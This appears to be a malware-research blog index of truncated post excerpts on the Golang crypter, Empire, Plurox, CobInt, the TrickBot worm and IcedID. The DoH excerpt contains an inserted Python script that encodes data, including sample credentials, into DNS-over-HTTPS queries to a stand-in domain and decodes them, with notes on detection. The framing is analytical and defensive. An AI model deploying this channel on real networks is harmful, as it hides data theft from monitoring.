A COVID-themed document was mentioned on Twitter[1] by @ximo_lcg. Checking the Any.Run sandbox detonation[2] shows a TLS connection and an execution of rundll, so I decided to take a look.| Random RE
After finding a collection of samples, I noticed they were covered in a report: https://securelist.com/mokes-and-buerak-distributed-under-the-guise-of-security-certificates/96324/
The malware in this report has been blogged about before by a Russian researcher¹, who referred to it as “Obscene Trojan”, so that is what I will call it too. We will go over its functionality in depth later in this post, but the more interesting part to me is the initial layer around the malware: it is written in Golang! This layer serves both as the wrapper you would normally expect to see with a crypter and as a dropper, since it writes the decoded malware to disk and detonates it instead of ...
PowerShell Empire is a post-exploitation framework that premiered at BSidesLV in 2015, developed by some all-around great individuals whose work I would highly recommend following and reading. It is a framework that is used pretty frequently by pentesters; however, like all good pentester tools, the better it is, the more likely it will end up being used by the bad guys. I'm not here to debate any of that, or even to talk about detecting a framework versus detecting TTPs, to...
Intro Recently I saw someone mention a sample of Plurox performing code-flow obfuscation based on the result of a DNS request, which is kind of interesting. I have apparently lost the link to the person who originally mentioned the hash… so if you recognize it, let me know and I'll update this post.
Intro Doing exfiltration over DNS isn't a new concept, but recently lots of people have been jumping on the DNS-over-HTTP(S)[3] bandwagon, which adds an interesting new layer to an existing TTP. This blog post simply aims to prove that it is possible. We're going to start with an existing DoH server and client written by Star Brilliant[1]. This server and client are set up in a way that makes for easy testing, as they allow the traffic to pass through.
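To make the TTP concrete, here is the encoding half of DNS-over-HTTPS exfiltration as an added example. It is not code from the post above and not Star Brilliant's DoH server or client: it chunks data into DNS labels, wraps each chunk in a wire-format query, and encodes that as the `dns` parameter of an RFC 8484 GET request, then shows the receiving side (a resolver you control, or a detection rule inspecting the `dns` parameter) reversing the process. Nothing touches the network. `EXFIL_DOMAIN` is a hypothetical name chosen for the example, and the payload in `round_trip` is constructed.

```python
"""DNS-over-HTTPS exfiltration, encoding and decoding halves.

Added example, not the original post's code and not Star Brilliant's
DoH server/client. EXFIL_DOMAIN is a hypothetical name; use one you own.
Offline only: queries are built and parsed as bytes, never sent.
"""
import base64
import struct

EXFIL_DOMAIN = "exfil.example"   # hypothetical, for this example only
MAX_LABEL = 63                    # RFC 1035 label limit
MAX_NAME = 253                    # practical limit for a full name
QTYPE_TXT = 16
QCLASS_IN = 1


def encode_chunks(data: bytes, domain: str = EXFIL_DOMAIN) -> list:
    """Return the query names that carry `data`, in sequence order.

    Layout: s<seq>.<label>...<label>.<domain>. The seq label lets the
    receiver reorder and de-duplicate, since resolvers retry and reorder.
    Base32 is used because DNS names are case-insensitive.
    """
    enc = base64.b32encode(data).decode("ascii").rstrip("=").lower()
    names, pos, seq = [], 0, 0
    while pos < len(enc):
        seq_label = f"s{seq}"
        labels = [seq_label]
        used = len(seq_label) + 1 + len(domain)   # seq label, its dot, domain
        # Each data label adds len(piece) + 1 for its trailing dot.
        while pos < len(enc) and used + 2 <= MAX_NAME:
            room = min(MAX_LABEL, MAX_NAME - used - 1)
            piece = enc[pos:pos + room]
            labels.append(piece)
            used += len(piece) + 1
            pos += len(piece)
        names.append(".".join(labels + [domain]))
        seq += 1
    return names


def build_query(qname: str, qtype: int = QTYPE_TXT, txid: int = 0) -> bytes:
    """Wire-format DNS query (RFC 1035). RFC 8484 suggests ID 0 for GET."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)   # RD set
    qn = b"".join(bytes([len(l)]) + l.encode("ascii")
                  for l in qname.split(".")) + b"\x00"
    return header + qn + struct.pack("!HH", qtype, QCLASS_IN)


def doh_get_path(query: bytes, path: str = "/dns-query") -> str:
    """Request target of a DoH GET: base64url with padding stripped."""
    enc = base64.urlsafe_b64encode(query).decode("ascii").rstrip("=")
    return f"{path}?dns={enc}"


def doh_path_to_query(path: str) -> bytes:
    """Receiver side: recover the wire-format query from the GET target."""
    param = path.split("dns=", 1)[1]
    param += "=" * (-len(param) % 4)
    return base64.urlsafe_b64decode(param)


def parse_qname(query: bytes) -> str:
    """Pull QNAME out of a wire-format query (queries use no compression)."""
    pos, labels = 12, []
    while True:
        n = query[pos]
        pos += 1
        if n == 0:
            break
        labels.append(query[pos:pos + n].decode("ascii"))
        pos += n
    return ".".join(labels)


def decode_chunks(qnames, domain: str = EXFIL_DOMAIN) -> bytes:
    """Receiver side: keep our names, order by seq, undo base32."""
    suffix = "." + domain
    chunks = {}
    for name in qnames:
        if not name.endswith(suffix):
            continue                          # ordinary lookup, not ours
        labels = name[:-len(suffix)].split(".")
        chunks[int(labels[0][1:])] = "".join(labels[1:])   # dedupes retries
    enc = "".join(chunks[k] for k in sorted(chunks)).upper()
    enc += "=" * (-len(enc) % 8)
    return base64.b32decode(enc)


def round_trip(data: bytes) -> bytes:
    """Client encodes, receiver decodes with order shuffled and one retry."""
    paths = [doh_get_path(build_query(n)) for n in encode_chunks(data)]
    seen = [parse_qname(doh_path_to_query(p)) for p in reversed(paths + paths[:1])]
    return decode_chunks(seen)


if __name__ == "__main__":
    sample = b"user=alice;pass=hunter2;" * 20        # constructed payload
    for n in encode_chunks(sample):
        print(len(n), n[:40] + "...")
    print(round_trip(sample) == sample)
```

Every name stays at or under 253 characters with 63-character labels, which is exactly the shape a detection rule should key on: long, high-entropy labels under one apex, many distinct queries in a short window, and all of it hidden inside HTTPS to a public DoH endpoint rather than port 53.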
Another week and another CobInt downloader campaign, but instead of their usual kits used to deliver the downloader, this time we have an embedded Flash file.
Finally got some time to look a little deeper at the TrickBot worm module. There have already been a number of posts about this malware developing plugins related to network propagation[1] with its worm module. As shared by Brad (@malware_traffic)[3] in a PCAP, this malware has been seen propagating over SMB; it was believed they were testing an SMB exploit, but most of the PCAPs I've gone through show the worming happening over SMB with EternalBlue. Most of the shellc...
IcedID continues to evolve, yet not a lot of attention is given to it. Joshua Platt, Vitali Kremez and I recently released a report[1] detailing how they have been targeting, and continue to target, tax season in the midst of the COVID-19 pandemic, which has extended tax season in the US to July.